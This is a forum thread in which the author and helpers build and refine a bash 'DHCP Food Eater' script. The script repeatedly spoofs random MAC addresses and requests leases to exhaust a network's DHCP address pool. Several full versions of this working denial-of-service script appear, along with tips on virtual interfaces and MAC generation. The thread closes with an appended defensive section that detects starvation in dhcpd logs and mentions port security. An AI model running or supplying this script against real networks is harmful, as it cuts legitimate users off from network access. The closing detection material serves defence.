TheFunk

DHCP Starvation Script

11 posts in this topic

I wrote a simple DHCP starvation script the other day. It's a bash script per my usual. It requires you to have dhcpcd and macchanger installed. However, a problem occurs when I bring the target interface down. Instead of holding the lease for however long, I'm finding that most DHCP servers will instantly re-add the IP address that my computer acquired back to the pool and then reissue it when I make a request from a new (spoofed) MAC address. Anyone have any ideas for how I can resolve this issue? Perhaps there's a means of creating subinterfaces in Linux, that way I don't have to break connection? Anyway, here you are, enjoy! If anyone is interested in the script, I plan on changing it so that it takes parameters, for example ./foodeater --nmask 24, or something along those lines in the near future.

#!/bin/bash
#
# DHCP Food Eater
# by TheFunk
#
# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
echo ""
echo "How many addresses should we try to exhaust?"
read range
clear
echo ""
echo "What interface are we using?"
read daint
for ((current=1; current<range; current++));
do
kill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`
ifconfig $daint down
macchanger -A $daint
sleep 2
ifconfig $daint up
dhcpcd $daint
sleep 5
echo "I have" $current "addresses"
done

 


Revised Version. Now with more ease of use.

 

#!/bin/bash
#
# DHCP Food Eater
# by TheFunk
#
# Usage: ./foodeater number-of-requests-to-make interface-to-use
# Usage Example: ./foodeater 255 wlan0
# In the above example the script will request 255 unique IP addresses from the DHCP server.
# If the network is a typical Class C with a /24 network mask, then 254 should be the
# maximum number of IP addresses available, and the 255th request should throw an error.
# In the example case, the network is wireless, as indicated by the name wlan0.
# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
range=$1
daint=$2
cat <<"EOF"
Ready?
            (\____/)
            / @__@ \
           (  (oo)  )
            `-.~~.-'
             /    \
           @/      \_
          (/ /    \ \)
      jgs  WW`----'WW
	Press Enter
EOF
read hold
for ((current=1; current<range; current++));
do
kill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`
ifconfig $daint down
macchanger -A $daint
sleep 2
ifconfig $daint up
dhcpcd $daint
sleep 3
echo "I have" $current "addresses"
done

Heh, nice work! DHCP is often overlooked as a source of trouble from outsiders on networks. One situation that comes to mind is captive portal Internet gateways.


Thanks! Also, I read your post on NELF. If I lived anywhere farther North I would have definitely been there. A festival dedicated to Linux? Yes please.


hello (just registered)

 

 

you can also just use ifconfig, like this

 

ifconfig eth0 down
ifconfig eth0 hw ether 00:11:22:33:44:55
ifconfig eth0 up

 

no need to install additional software


That's true, and glad to have been your first post :)

The thing that really appealed to me about using macchanger though was the pseudo-random generator. It would be a pain in the butt to generate a random MAC address with bash. I could have also just stuck with dhclient instead of using dhcpcd, but that's a matter of personal preference.

Lastly, I realize an error in the script, the for statement at the end should read "for ((current=1; current<=range; current++));" instead of "for ((current=1; current<range; current++));"


For generating a random(ish) MAC address, can you sample /dev/(u)random and convert what you get to hex?


And if you don't want to bring the if down you can use virtual interfaces

 

ip link add type veth (will generate a random mac and increment the name. veth0, veth1...)

ifconfig veth0 up

ifconfig veth0 inet dhcp

 

maybe like this you can get multiple interfaces leased at the same time


That's perfect! That's exactly what I was trying to figure out how to do! Virtual/Sub interfaces. Come to think of it, I probably should have just Googled that. Thanks!

And I'll see about /dev/urandom. The key will be only pulling hex characters, but that shouldn't be too hard. Fellas, you've given me a lot to work with.


Getting a MAC address from /dev/urandom:

 

dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'

 

Remember, every byte can be expressed as hex :D

 

EDIT: Removed `status=none`, apparently it doesn't work on BSD `dd`

 

EDIT AGAIN: Derp, 6 bytes, 12 hex /digits/


Alrighty, I'm definitely getting closer. The only problem left now is finding a way to give each subinterface its own unique spoofed MAC instead of just the parent interface. For some reason the aliased interfaces refuse to take individual MAC addresses. I tried the veth method, but that allowed for a maximum of 2 "virtual interfaces" when I tried, so this was the next best thing I could think of. I'm going to look into ip addr and see if that might help some. Now...back to the Batcave!
 

#!/bin/bash
#
# DHCP Food Eater
# by TheFunk
#
# Usage: ./foodeater number-of-requests-to-make interface-to-use
# Usage Example: ./foodeater 255 wlan0
# In the above example the script will request 255 unique IP addresses from the DHCP server.
# If the network is a typical Class C with a /24 network mask, then 254 should be the
# maximum number of IP addresses available, and the 255th request should throw an error.
# In the example case, the network is wireless, as indicated by the name wlan0.
# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
range=$1
daint=$2
cat <<"EOF"
Ready?
            (\____/)
            / @__@ \
           (  (oo)  )
            `-.~~.-'
             /    \
           @/      \_
          (/ /    \ \)
      jgs  WW`----'WW
	Press Enter
EOF
read hold
# Spoofs MAC address.
ifconfig $daint down
macaddr=`dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'`
ifconfig $daint hw ether $macaddr
# Loops until all addresses are exhausted...and then some.
for ((current=1; current<=range; current++));
do
ifconfig $daint":"$current
dhcpcd $daint
echo "I have" $current "addresses"
done
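The server-side view of what this thread describes, as an added example that is not part of any post above: each pass of the loop presents a new client MAC, so a run of DHCPDISCOVER lines from distinct MACs in one minute, ending in "no free leases", is the pattern to alert on. The log lines are constructed samples in ISC dhcpd's syslog wording; the function names, the one-minute window and the threshold are assumptions.

```bash
#!/bin/bash
# Added example (not from the thread): flag DHCP starvation in dhcpd-style
# syslog lines. Message wording follows ISC dhcpd; the one-minute window
# and the threshold are assumptions to tune for the network being watched.

# Constructed sample log: two ordinary clients, then a burst of new MACs.
sample_log() {
  cat <<'EOF'
Mar  3 10:14:02 gw dhcpd: DHCPDISCOVER from 00:1a:2b:3c:4d:5e via eth1
Mar  3 10:14:03 gw dhcpd: DHCPDISCOVER from 00:1a:2b:3c:4d:5e via eth1
Mar  3 10:14:40 gw dhcpd: DHCPDISCOVER from 3c:52:82:10:20:30 via eth1
Mar  3 10:15:01 gw dhcpd: DHCPDISCOVER from 00:e0:4c:9a:01:11 via eth1
Mar  3 10:15:08 gw dhcpd: DHCPDISCOVER from 00:0d:93:44:c2:07 via eth1
Mar  3 10:15:15 gw dhcpd: DHCPDISCOVER from 00:16:b6:5f:0e:a3 via eth1
Mar  3 10:15:22 gw dhcpd: DHCPDISCOVER from 00:04:76:d1:38:6c via eth1
Mar  3 10:15:29 gw dhcpd: DHCPDISCOVER from 00:90:27:7b:e4:19 via eth1: network 192.168.1.0/24: no free leases
Mar  3 10:15:36 gw dhcpd: DHCPDISCOVER from 00:a0:c9:2e:55:f0 via eth1: network 192.168.1.0/24: no free leases
EOF
}

# detect_starvation THRESHOLD
# Reads the log on stdin. For every minute in which at least THRESHOLD
# distinct client MACs sent a DHCPDISCOVER, prints
#   "<month> <day> <hh:mm> macs=<distinct MACs> exhausted=<no-free-lease replies>"
detect_starvation() {
  awk -v thr="$1" '
    /DHCPDISCOVER from/ {
      minute = $1 " " $2 " " substr($3, 1, 5)
      for (i = 1; i < NF; i++) if ($i == "from") mac = tolower($(i + 1))
      if (!(minute in macs)) order[++n] = minute      # keep log order
      if (!((minute, mac) in seen)) { seen[minute, mac] = 1; macs[minute]++ }
      if (/no free leases/) full[minute]++            # pool is empty
    }
    END {
      for (k = 1; k <= n; k++) {
        m = order[k]
        if (macs[m] >= thr + 0)
          printf "%s macs=%d exhausted=%d\n", m, macs[m], full[m] + 0
      }
    }'
}

sample_log | detect_starvation 5
```

Log-based detection fires after leases are already gone; limiting the number of MAC addresses learned per access port (port security) and rate-limiting DHCP with DHCP snooping on the switch stops the loop after its first few requests.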